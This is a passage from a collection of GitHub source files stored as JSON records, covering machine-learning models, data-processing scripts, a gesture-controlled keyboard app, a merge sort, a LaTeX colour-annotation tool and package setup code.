Nonfiction\",\n \"Audio Fiction\",\"Audio Nonfiction\",\"Combined Print Fiction\",\"Combined Print Nonfiction\"]\n\n Best_books=[]\n for i in costum_list:\n df=best_ctg_maker(query=i)\n Best_books.append(df)\n time.sleep(10)\n #last dataframe concatenating \n Best_books_df=pd.concat(Best_books)\n #Best_books_df.to_csv(\"output/best_book_list.csv\",index=False)\n return Best_books_df\n\n\n\nbest_book_df_maker()","repo_name":"lalesafarzade/Best_seller_books","sub_path":"main/NYT_API.py","file_name":"NYT_API.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72640374667","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchsummary import summary\nfrom YoloV3.nets.yolo_basic_blocks import conv2D_BN_LeakyRelu, MaxPoolPaddedStride1\n# from DeepTools.Onnx2TRT.onnx_ternsorRT import pytorch2onnx\n\nclass YoloV3_tiny(nn.Module):\n def __init__(self, args):\n super(YoloV3_tiny, self).__init__()\n\n self.num_classes = args.num_classes\n self.num_anchors = args.num_anchors_per_resolution\n\n self.num_output_features = self.num_anchors * (4 + 1 + self.num_classes)\n\n self.conv2D_BN_LeakyRelu1 = conv2D_BN_LeakyRelu(inplanes=3, outplanes=16, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu2 = conv2D_BN_LeakyRelu(inplanes=16, outplanes=32, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu3 = conv2D_BN_LeakyRelu(inplanes=32, outplanes=64, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu4 = conv2D_BN_LeakyRelu(inplanes=64, outplanes=128, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu5 = conv2D_BN_LeakyRelu(inplanes=128, outplanes=256, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu6 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=512, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu7 = conv2D_BN_LeakyRelu(inplanes=512, outplanes=1024, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu8 = conv2D_BN_LeakyRelu(inplanes=1024, outplanes=256, kernelsize=1, stride=1, padding=0)\n self.conv2D_BN_LeakyRelu9 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=512, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu10 = conv2D_BN_LeakyRelu(inplanes=512, outplanes=self.num_output_features, kernelsize=1, stride=1, padding=0)\n self.conv2D_BN_LeakyRelu11 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=128, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu12 = conv2D_BN_LeakyRelu(inplanes=384, outplanes=256, kernelsize=3, stride=1, padding=1)\n self.conv2D_BN_LeakyRelu13 = conv2D_BN_LeakyRelu(inplanes=256, outplanes=self.num_output_features, kernelsize=1, stride=1, padding=0)\n\n self.MaxPoolPaddedStride1 = MaxPoolPaddedStride1()\n\n def forward(self, x):\n\n # input size = 416x416x3\n x = self.conv2D_BN_LeakyRelu1(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n # 208x208x16\n x = self.conv2D_BN_LeakyRelu2(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n # 104x104x32\n x = self.conv2D_BN_LeakyRelu3(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n\n # 52x52x64\n x = self.conv2D_BN_LeakyRelu4(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(x)\n\n # 26x26x128\n y0 = self.conv2D_BN_LeakyRelu5(x)\n x = nn.MaxPool2d(kernel_size=2, stride=2)(y0)\n\n # 13x13x256\n x = self.conv2D_BN_LeakyRelu6(x)\n x = self.MaxPoolPaddedStride1(x)\n\n # 13x13x512\n x = self.conv2D_BN_LeakyRelu7(x)\n # 13x13x1024\n y1 = self.conv2D_BN_LeakyRelu8(x)\n # 13x13x256\n x = self.conv2D_BN_LeakyRelu9(y1)\n # 13x13x512\n out1 = self.conv2D_BN_LeakyRelu10(x)\n # 13x13xnum_ouput_features\n\n # 13x13x256\n y1 = self.conv2D_BN_LeakyRelu11(y1)\n y1 = nn.Upsample(scale_factor=2, mode=\"nearest\")(y1)\n # 26x26x128\n y = torch.cat(tensors=(y0, y1), dim=1)\n # 26x26x384\n y = self.conv2D_BN_LeakyRelu12(y)\n # 26x26x256\n out2 = self.conv2D_BN_LeakyRelu13(y)\n # 26x26xnum_ouput_features\n\n return out1, out2\n\n\nif __name__ == \"__main__\":\n \"\"\" testing network \"\"\"\n from PIL import Image\n import argparse\n from torchviz import make_dot\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--num-classes', type=int, default=2,\n help=\"number of classes\")\n\n args = parser.parse_args()\n\n x = torch.zeros(1, 3, 416, 416)\n model = YoloV3_tiny(args)\n\n\n x = torch.zeros(1, 3, 416, 416)\n x = x.float()\n\n\n graph = make_dot(model(x))\n graph.render('./output/net/yolov3-tiny')\n\n # model_onnx = torch.onnx.export(model, x, './output/net/test.onnx', verbose=True, opset_version=11)\n pytorch2onnx(model, (1, 3, 416, 416), './output/net/yolov3_tiny.onnx')","repo_name":"AmitNativ1984/YoloV3Distance","sub_path":"YoloV3/nets/yolov3_tiny.py","file_name":"yolov3_tiny.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"3223469625","text":"import cv2\nimport pyautogui\n\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\nimport numpy as np\nimport os\nimport time\n\n\nCWD = os.getcwd()\nMODEL_PATH = os.path.join(CWD , \"gestures_vgg16_finetuned_multilabel.h5\")\n\nclassmodel = load_model(MODEL_PATH, compile=False)\nprint(\"Loaded Model from Disk\")\n\nisBgCaptured = False\nthreshold = 60\nlearningRate = 0\nbgModel = None\nframecount = 0\nindices = {0 : 'cool', 1 : 'fist', 2 : 'ok', 3 : 'stop', 4 : 'yo'}\n\nsecondgesture = 0\nfirstgesture = 0\nlengthgesture = 1\nexecuteflag = False\n\naltflag = False\nvolflag = False\n\ncap = cv2.VideoCapture(0)\n\ndef remove_background(frame): \n foremask = bgModel.apply(frame, learningRate=learningRate)\n kernel = np.ones((3, 3), np.uint8)\n foremask = cv2.erode(foremask, kernel, iterations=1)\n finalres = cv2.bitwise_and(frame, frame, mask=foremask)\n return finalres\n\n\nwhile(True):\n ret, img = cap.read()\n img = cv2.bilateralFilter(img, 5, 50, 100)\n img = cv2.flip(img,1)\n img = img[100:400, 100:400]\n cv2.imshow('Original Window', img)\n \n \n \n if isBgCaptured == True and framecount % 2 == 1:\n frame = remove_background(img)\n \n grey = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n value = (35, 35)\n blurred = cv2.GaussianBlur(grey, value, 0)\n _, thresh = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n cv2.imshow(\"thresh\", thresh)\n \n if np.count_nonzero(thresh.astype(np.float32))/900.0 > 3.0 :\n \n cv2.imwrite(\"test.jpg\", thresh)\n \n img = image.load_img(\"test.jpg\", target_size=(224, 224), color_mode='rgb')\n img_tensor = image.img_to_array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n img_tensor /= 255.\n \n prediction = classmodel.predict(img_tensor)\n \n predict = np.argmax(prediction)\n if prediction[0][predict] > 0.5 :\n gestureclass = indices[predict]\n \n secondgesture = firstgesture\n firstgesture = predict\n #print(gestureclass)\n \n if secondgesture != firstgesture :\n lengthgesture = 1\n executeflag = True\n else : \n lengthgesture += 1\n \n if lengthgesture > 2 and executeflag == True:\n if secondgesture == 0 and altflag:\n pyautogui.press('tab')\n print('tab')\n \n if secondgesture == 0 and volflag:\n pyautogui.press('volumeup')\n print('volumeup')\n \n if secondgesture == 3 and volflag:\n pyautogui.press('volumedown')\n print('volumedown')\n \n if secondgesture == 3 and not volflag:\n if altflag :\n pyautogui.keyUp('altleft') \n altflag = False\n print('unpressed altleft')\n else :\n pyautogui.keyDown('altleft')\n altflag = True\n print('pressed altleft')\n \n if secondgesture == 2 :\n if volflag : \n volflag = False\n print('unpressed volcontrol')\n else :\n volflag = True\n print('pressed volcontrol')\n altflag = False\n print('unpressed altleft')\n \n if secondgesture == 4 :\n pyautogui.press('playpause')\n print('playpause')\n \n executeflag = False\n \n \n #KeyBoard stuff\n k = cv2.waitKey(1)\n if k == 27:\n break\n elif k == ord('b'): # press 'b' to capture the background\n bgModel = cv2.createBackgroundSubtractorMOG2(0, 50, detectShadows = False)\n isBgCaptured = True\n time.sleep(1)\n print('Background captured')\n elif k == ord('r'): # press 'r' to reset the background\n time.sleep(1)\n bgModel = None\n isBgCaptured = False\n print('Reset background')\n \n framecount += 1\n \n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"sudoRicheek/Gestures-For-3D-Space","sub_path":"Notes And Basic Implementations/Gesture Application Model/Gesture_Application.py","file_name":"Gesture_Application.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70640924109","text":"\"\"\"\nThe cross validation function for finetuning.\nThis implementation is adapted from\nhttps://github.com/chemprop/chemprop/blob/master/chemprop/train/cross_validate.py\n\"\"\"\nimport os\nimport time\nfrom argparse import Namespace\nfrom logging import Logger\nfrom typing import Tuple\n\nimport numpy as np\n\nfrom grover.util.utils import get_task_names\nfrom grover.util.utils import makedirs\nfrom task.run_evaluation import run_evaluation\nfrom task.train import run_training\n\n\ndef cross_validate(args: Namespace, logger: Logger = None) -> Tuple[float, float]:\n \"\"\"\n k-fold cross validation.\n\n :return: A tuple of mean_score and std_score.\n \"\"\"\n info = logger.info if logger is not None else print\n\n # Initialize relevant variables\n init_seed = args.seed\n save_dir = args.save_dir\n task_names = get_task_names(args.data_path)\n\n # Run training with different random seeds for each fold\n all_scores = []\n time_start = time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime())\n for fold_num in range(args.num_folds):\n info(f'Fold {fold_num}')\n args.seed = init_seed + fold_num\n args.save_dir = os.path.join(save_dir, f'fold_{fold_num}')\n makedirs(args.save_dir)\n if args.parser_name == \"finetune\":\n model_scores = run_training(args, time_start, logger)\n else:\n model_scores = run_evaluation(args, logger)\n all_scores.append(model_scores)\n all_scores = np.array(all_scores)\n\n # Report scores for each fold\n info(f'{args.num_folds}-fold cross validation')\n\n for fold_num, scores in enumerate(all_scores):\n info(f'Seed {init_seed + fold_num} ==> test {args.metric} = {np.nanmean(scores):.6f}')\n\n if args.show_individual_scores:\n for task_name, score in zip(task_names, scores):\n info(f'Seed {init_seed + fold_num} ==> test {task_name} {args.metric} = {score:.6f}')\n\n # Report scores across models\n avg_scores = np.nanmean(all_scores, axis=1) # average score for each model across tasks\n mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)\n info(f'overall_{args.split_type}_test_{args.metric}={mean_score:.6f}')\n info(f'std={std_score:.6f}')\n\n if args.show_individual_scores:\n for task_num, task_name in enumerate(task_names):\n info(f'Overall test {task_name} {args.metric} = '\n f'{np.nanmean(all_scores[:, task_num]):.6f} +/- {np.nanstd(all_scores[:, task_num]):.6f}')\n\n return mean_score, std_score\n","repo_name":"tencent-ailab/grover","sub_path":"task/cross_validate.py","file_name":"cross_validate.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"82"} +{"seq_id":"12689953533","text":"import csv\n\nk = 5\nfor i in range(k):\n result = []\n slide_file = open('/home/zhw/Siam_SSA/table/slide_dir.csv', 'r')\n slide_reader = csv.reader(slide_file)\n for idx,(slide_id, folder, label, patch_num, ratio) in enumerate(slide_reader,0):\n if idx%k==i:\n result.append([slide_id, folder, label, patch_num, ratio])\n slide_file.close()\n with open(\"../table/folder_\"+str(i)+\".csv\",\"w\",encoding=\"utf-8\",newline='') as f:\n writer=csv.writer(f)\n writer.writerows(result)\n f.close()","repo_name":"Wang-Zhihua/BSFT_SAG","sub_path":"utils/k_folder.py","file_name":"k_folder.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33614339116","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('user_id', models.PositiveSmallIntegerField(blank=True, null=True)),\n ('act_title', models.CharField(max_length=100)),\n ('act_description', models.CharField(max_length=250)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Stat',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('count', models.PositiveIntegerField(blank=True, null=True)),\n ('date_done', models.DateTimeField(auto_now_add=True)),\n ('activity', models.ForeignKey(to='stats_app.Activity')),\n ],\n ),\n ]\n","repo_name":"TylerKotkin/stats_tracker","sub_path":"stats_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4366593022","text":"import balltree\nimport data_loader\nimport kdtree as deviation_util\nimport mostrated_main as mostrated_util\n\nK = 100\n\nuser_to_movies_matrix_global = None\n\nif __name__ == \"__main__\":\n # Load training data with self/new user ratings\n raw_training_data = data_loader.load_newuser_training_data_from_text()\n\n # Form a user*movie_ratings matrix\n user_to_movies_matrix = data_loader.build_user_x_movie_matrix(raw_training_data)\n user_to_movies_matrix_global = user_to_movies_matrix\n\n # Create an absolute deviation matrix\n absolute_deviation_matrix = deviation_util.get_deviation_from_mean_matrix(user_to_movies_matrix)\n\n # Sample the N most commonly rated movies for our Ball tree\n mostrated_movies = mostrated_util._get_n_most_rated_movies(user_to_movies_matrix, n=100)\n users_to_most_rated_movies_matrix = user_to_movies_matrix[:, mostrated_movies]\n most_rated_movies_deviation_matrix = absolute_deviation_matrix[:, mostrated_movies]\n\n # Do predictions for all movies that are not rated\n balltree.predict_new_user_rating(most_rated_movies_deviation_matrix, absolute_deviation_matrix, raw_training_data)\n","repo_name":"jaipreet92/netflixprize_hw2","sub_path":"src/newuser_main.py","file_name":"newuser_main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40472754954","text":"#lets start with crud on grocery list\nmy_list = [\n {'name' : 'bread', 'price': 0.5, 'quantity' : 20},\n {'name' : 'milk', 'price': 1, 'quantity' : 30},\n {'name' : 'butter', 'price': 2, 'quantity' : 10},\n {'name' : 'yogurt', 'price': 3, 'quantity' : 35},\n]\n\n#create functionality\nitems = list() #it will be a global variable where we store all data\ndef create_items(app_items):\n global items\n items = app_items\n\ndef create_item(name, price, quantity):\n global items\n items.append({'name' : name, 'price': price, 'quantity' : quantity})\n\n#read functionality\n# def read_item()\n\n","repo_name":"swati121/Python_basics","sub_path":"mvc.py","file_name":"mvc.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35053897995","text":"import numpy as np\n\n\ndef sampling(src_nodes, sample_num, neighbor_table):\n \"\"\"根据源节点采样指定数量的邻居节点,注意使用的是有放回的采样;\n 某个节点的邻居节点数量少于采样数量时,采样结果出现重复的节点\n \n Arguments:\n src_nodes {list, ndarray} -- 源节点列表\n sample_num {int} -- 需要采样的节点数\n neighbor_table {dict} -- 节点到其邻居节点的映射表\n \n Returns:\n np.ndarray -- 采样结果构成的列表\n \"\"\"\n results = []\n for sid in src_nodes:\n # 从节点的邻居中进行有放回地进行采样\n res = np.random.choice(neighbor_table[sid], size=(sample_num, ))\n results.append(res)\n return np.asarray(results).flatten()\n\n\ndef multihop_sampling(src_nodes, sample_nums, neighbor_table):\n \"\"\"根据源节点进行多阶采样\n \n Arguments:\n src_nodes {list, np.ndarray} -- 源节点id\n sample_nums {list of int} -- 每一阶需要采样的个数\n neighbor_table {dict} -- 节点到其邻居节点的映射\n \n Returns:\n [list of ndarray] -- 每一阶采样的结果\n \"\"\"\n sampling_result = [src_nodes]\n for k, hopk_num in enumerate(sample_nums):\n hopk_result = sampling(sampling_result[k], hopk_num, neighbor_table)\n sampling_result.append(hopk_result)\n return sampling_result\n","repo_name":"FighterLYL/GraphNeuralNetwork","sub_path":"chapter7/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"zh","doc_type":"code","stars":1548,"dataset":"github-code","pt":"82"} +{"seq_id":"26617178274","text":"import colorsys\nimport os\nimport pickle\n\nfrom spacy.lang.en import English\nfrom spacy.tokenizer import Tokenizer\n\n\nclass TOCNode:\n def __init__(self, section_id, level=-1):\n self.section_id = section_id\n self.level = level\n self.children = []\n\n def add_child(self, child):\n self.children.append(child)\n \n def export(self):\n if self.section_id > 0:\n ret = str(self.section_id) + \"\\n\"\n else:\n ret = ''\n for child in self.children:\n ret += str(self.section_id) + '\\t' + child.export()\n return ret\n \n\nclass TableOfContents:\n level2macro = ['title', 'part', 'chapter', 'section', 'subsection', 'subsubsection', 'paragraph', 'subparagraph']\n macro2level = {v:k for k, v in enumerate(level2macro)}\n def __init__(self):\n self.root = TOCNode(0)\n self.current_node = self.root\n self.current_section_id = 0\n\n def add_node(self, macro):\n if macro not in self.macro2level:\n print(f\"Invalid grading: {macro}. Please use one of {', '.join(self.level2macro)}\")\n return\n\n # Determine the depth where the new node should be inserted\n depth = self.macro2level[macro]\n\n # Navigate back to the correct parent for this grading\n while self.current_node.level >= depth:\n self.current_node = self._find_parent(self.current_node)\n\n # Create the new node and make it a child of the current node\n new_node = TOCNode(self.current_section_id+1, depth)\n self.current_node.add_child(new_node)\n\n # Set the current node to the newly added node\n self.current_node = new_node\n self.current_section_id += 1\n\n def _find_parent(self, node):\n \"\"\"Find parent of a node in the tree starting from root. Return None if parent is not found.\"\"\"\n nodes_to_check = [self.root]\n while nodes_to_check:\n current_node = nodes_to_check.pop()\n if node in current_node.children:\n return current_node\n nodes_to_check.extend(current_node.children)\n return None\n \n def get_current_section_id(self):\n assert self.current_node.section_id == self.current_section_id\n return self.current_node.section_id\n\n def export_toc(self):\n s = self.root.export()\n ret = []\n for line in s[:-1].split('\\n'):\n if line:\n head, section_id = line.split('\\t')\n ret.append((int(section_id), int(head)))\n return ret\n\n\ndef generate_rainbow_colors(): # number of color in one color\n if os.path.isfile('data/rainbow_colors_list.pkl'):\n return pickle.load(open('data/rainbow_colors_list.pkl', 'rb'))\n \n all_colors = []\n all_colors_set = set()\n\n # Define steps for hue, saturation, and value\n hue_list = []\n for i in range(0, 359):\n hue_list.append(i/359)\n\n splited_hue_list = [hue_list[i::5] for i in range(5)]\n\n s_v_list = []\n for s in [i for i in range(256, 50, -1)]: \n for v in [i for i in range(256, 50, -1)]:\n s_v_list.append([s/256, v/256])\n #print(\"num of s_v set: \", len(s_v_list))\n\n hue_list = []\n for s_v in s_v_list:\n for sub_hue_list in splited_hue_list:\n for hue in sub_hue_list:\n h = hue; s = s_v[0]; v = s_v[1]\n r, g, b = [int(x * 255) for x in colorsys.hsv_to_rgb(h, s, v)]\n #print((hue/10, s/100, v/100), \"\\t\", (r, g, b))\n if (r, g, b) not in all_colors_set:\n all_colors_set.add((r, g, b))\n all_colors.append((r, g, b))\n #print(\"num of color: \", len(all_colors))\n os.mkdir('data')\n pickle.dump(all_colors, open('data/rainbow_colors_list.pkl', 'wb'))\n return all_colors\n\n\nclass ColorAnnotation:\n def __init__(self) -> None:\n self.color_dict = {}\n self.current_RGB = 0\n self.current_rgb = 0\n self.current_token_number = 0\n self.toc = TableOfContents()\n self.block_num = 0\n self.current_section_id = []\n self.all_color = generate_rainbow_colors()\n \n nlp = English()\n self.tokenizer = Tokenizer(nlp.vocab)\n\n def _get_next_rgb(self):\n assert self.current_rgb < 1331, \"rgb reach upper limit\"\n rgb_tuple = (self.current_rgb//121, self.current_rgb%121//11, self.current_rgb%121%11)\n self.current_rgb += 1\n rgb_string = []\n for rgb in rgb_tuple:\n if rgb > 10:\n raise \"color error\"\n elif rgb == 10:\n rgb_string.append(\"1\")\n else:\n rgb_string.append(\"0.%d\" % (rgb))\n return \",\".join(rgb_string)\n \n def _get_next_RGB(self):\n assert self.current_RGB < len(self.all_color), \"RGB reach upper limit\"\n #hex_string = self.int_to_hex_string(self.current_RGB)\n #RGB_tuple = self.hex_to_RGB(hex_string)\n RGB_tuple = self.all_color[self.current_RGB]\n hex_string = self.tuple_to_hex_string(RGB_tuple)\n self.current_RGB += 1\n return str(RGB_tuple)[1:-1], hex_string\n\n def __getitem__(self, key):\n return self.color_dict[key]\n \n def tuple_to_hex_string(self, tup):\n return '#%02x%02x%02x' % tup\n\n def int_to_hex_string(self, num: int):\n return \"#%06x\" % (num)\n\n def hex_to_RGB(self, value: str):\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \n def add_existing_color(self, color_str):\n self.color_dict[color_str] = None\n\n def add_annotation_RGB(self, tex_string, annotate):\n RGB_tuple, hex_string = self._get_next_RGB()\n while hex_string in self.color_dict:\n RGB_tuple, hex_string = self._get_next_RGB()\n self.color_dict[hex_string] = {\n \"label\": annotate,\n \"reading\": self.current_token_number,\n \"section\": self.toc.get_current_section_id(),\n \"block\": self.block_num,\n }\n self.current_token_number += 1\n return \"{\\\\color[RGB]{\" + RGB_tuple + \"}\" + tex_string + \"}\"\n\n def add_annotation_rgb(self, tex_string, annotate):\n rgb_tuple = self._get_next_rgb()\n while rgb_tuple in self.color_dict:\n rgb_tuple = self._get_next_rgb()\n self.color_dict[rgb_tuple] = {\n \"label\": annotate,\n \"reading\": self.current_token_number,\n \"section\": self.toc.get_current_section_id(),\n \"block\": self.block_num,\n }\n self.current_token_number += 1\n return \"\\\\colorbox[rgb]{\" + rgb_tuple + \"}{\" + tex_string + \"}\"\n","repo_name":"InsightsNet/texannotate","sub_path":"texannotate/color_annotation.py","file_name":"color_annotation.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"20729031438","text":"import os\nfrom PyPDF2 import PdfReader\nfrom transformers import SpeechT5Processor, SpeechT5ForTextToSpeech, SpeechT5HifiGan\nfrom datasets import load_dataset\nimport torch\nimport soundfile as sf\nfrom tqdm import tqdm\nimport textwrap\n# Function to extract text from a PDF file\ndef extract_text_from_pdf(pdf_path):\n reader = PdfReader(pdf_path)\n text = ''\n for page in reader.pages:\n text += page.extract_text()\n return text\n\ndef extract_text_from_file(file_path):\n if file_path.endswith('.pdf'):\n reader = PdfReader(file_path)\n text = ''\n for page in reader.pages:\n text += page.extract_text()\n return text\n elif file_path.endswith('.txt'):\n with open(file_path, 'r') as file:\n text = file.read()\n return text\n else:\n raise ValueError(\"Unsupported file type. Please provide a .pdf or .txt file.\")\n \n\ndef text_to_speech_with_speecht5(text, split_into_chunks=True):\n # Check if using GPU\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Using device:\", device)\n\n # Initialize the processor, model, and vocoder\n processor = SpeechT5Processor.from_pretrained(\"microsoft/speecht5_tts\")\n model = SpeechT5ForTextToSpeech.from_pretrained(\"microsoft/speecht5_tts\").to(device)\n vocoder = SpeechT5HifiGan.from_pretrained(\"microsoft/speecht5_hifigan\").to(device)\n\n # Load xvector containing speaker's voice characteristics from a dataset\n embeddings_dataset = load_dataset(\"Matthijs/cmu-arctic-xvectors\", split=\"validation\")\n speaker_embeddings = torch.tensor(embeddings_dataset[7306][\"xvector\"]).unsqueeze(0).to(device)\n\n # Split the text into chunks of 250 characters each if split_into_chunks is True\n text_chunks = textwrap.wrap(text, width=250) if split_into_chunks else [text]\n\n # Initialize an empty tensor to hold the speech\n speech = torch.tensor([]).to(device)\n\n # Process each chunk separately and concatenate the results\n for chunk in tqdm(text_chunks, desc=\"Processing text chunks\"): # Add progress bar here\n inputs = processor(text=chunk, return_tensors=\"pt\").to(device)\n chunk_speech = model.generate_speech(inputs[\"input_ids\"], speaker_embeddings, vocoder=vocoder)\n if chunk_speech is not None:\n speech = torch.cat((speech, chunk_speech), dim=0)\n\n # Write the speech audio to a file\n sf.write(\"speech1.wav\", speech.cpu().numpy(), samplerate=16000)\n\n print(\"Conversion completed.\")\n\n# Path to your file\nfile_path = '100west.txt' \n\n# Extract text from file\nfile_text = extract_text_from_file(file_path)\n\n# Convert extracted text to speech without splitting into chunks\ntext_to_speech_with_speecht5(file_text, split_into_chunks=True)","repo_name":"Tylerbryy/audiobook","sub_path":"test/speecht5.py","file_name":"speecht5.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29416908217","text":"arr = [1, 12, 12, 12, 13, 13, 13, 16, 25, 46]\r\nx = 12\r\n\r\ndef binarySearch(arr, x):\r\n\tlow = 0\r\n\tend = len(arr) - 1\r\n\twhile low <= end:\r\n\t\tmid = (low + end) // 2\r\n\t\tif x == arr[mid]:\r\n\t\t\tprint(arr[mid], mid+1)\r\n\t\t\tbreak\r\n\t\telif x > arr[mid]:\r\n\t\t\tlow = mid + 1\r\n\t\telse:\r\n\t\t\tend = mid - 1\r\n\r\ndef firstnLastElemSortedArray(arr, x):\r\n\tfirstPos = len(arr)\r\n\tlow = 0\r\n\tend = len(arr) - 1\r\n\r\n\twhile low <= end:\r\n\t\tmid = low + (end - low) // 2\r\n\t\tif x >= arr[mid]:\r\n\t\t\tfirstPos = mid\r\n\t\t\tend = mid - 1\r\n\t\telse:\r\n\t\t\tlow = mid + 1\r\n\r\n\treturn firstPos\r\n\r\n# binarySearch(arr, x)\r\n\r\nf = firstnLastElemSortedArray(arr, x)\r\nl = firstnLastElemSortedArray(arr, x+1) - 1\r\n\r\nif (f <= l):\r\n\treturn [f, l]\r\nreturn [-1, -1]","repo_name":"rahul-s-bhatt/ProgrammingTraning","sub_path":"Day 24/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25113419315","text":"def mersort(unslist):\n \"\"\"Return a sorted list from a list.\n\n Implementation after psuedocode here:\n https://en.wikipedia.org/wiki/Merge_sort\n \"\"\"\n if len(unslist) <= 1:\n return unslist\n lunslist = unslist[:len(unslist)/2]\n runslist = unslist[len(unslist)/2:]\n\n # Recursive calls\n lunslist = mersort(lunslist)\n runslist = mersort(runslist)\n\n return _merge(lunslist, runslist)\n\n\ndef _merge(llist, rlist):\n \"\"\"Desructively return an ascending sorted list from two ascending\n sorted lists.\n\n Implementation after psuedocode here:\n https://en.wikipedia.org/wiki/Merge_sort\n \"\"\"\n mlist = []\n llist.reverse()\n rlist.reverse()\n while llist and rlist:\n if llist[-1] <= rlist[-1]:\n mlist.append(llist.pop())\n else:\n mlist.append(rlist.pop())\n # For straglers, the following two blocks\n while llist:\n mlist.append(llist.pop())\n while rlist:\n mlist.append(rlist.pop())\n return mlist\n","repo_name":"jay-tyler/data-structures","sub_path":"dtypes/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"34893931133","text":"import pandas as pd\nfrom pix_framework.discovery.prioritization.discovery import discover_priority_rules\nfrom pix_framework.io.event_log import EventLogIDs\n\nfrom ..case_attributes.types import CaseAttribute\nfrom .types import PrioritizationRule\n\n\ndef discover_prioritization_rules(\n log: pd.DataFrame, log_ids: EventLogIDs, case_attributes: list[CaseAttribute]\n) -> list[PrioritizationRule]:\n \"\"\"\n Discover prioritization rules from a log.\n The enabled_time column is required. If it is missing, it will be estimated using the start-time-estimator.\n \"\"\"\n case_attribute_names = list(map(lambda x: x.name, case_attributes))\n\n rules = discover_priority_rules(\n event_log=log.rename( # Rename columns for hardcoded discovery package\n {log_ids.enabled_time: \"enabled_time\", log_ids.start_time: \"start_time\", log_ids.resource: \"Resource\"},\n axis=1,\n ),\n attributes=case_attribute_names,\n )\n\n rules = list(map(PrioritizationRule.from_prosimos, rules))\n\n return rules\n","repo_name":"AutomatedProcessImprovement/Simod","sub_path":"src/simod/prioritization/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"63"} +{"seq_id":"9748421847","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: SCMSpain\n\"\"\"\nfrom codecs import open\nfrom os import path\n\nfrom setuptools import setup, find_packages\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='slippinj',\n version='3.1.0',\n author='Data Architects SCM Spain',\n author_email='data.architecture@scmspain.com',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n include_package_data=True,\n url='https://github.com/scm-spain/slippin-jimmy',\n description='Tools to generate and deploy Apache Oozie workflows',\n long_description=long_description,\n license='GPLv2',\n 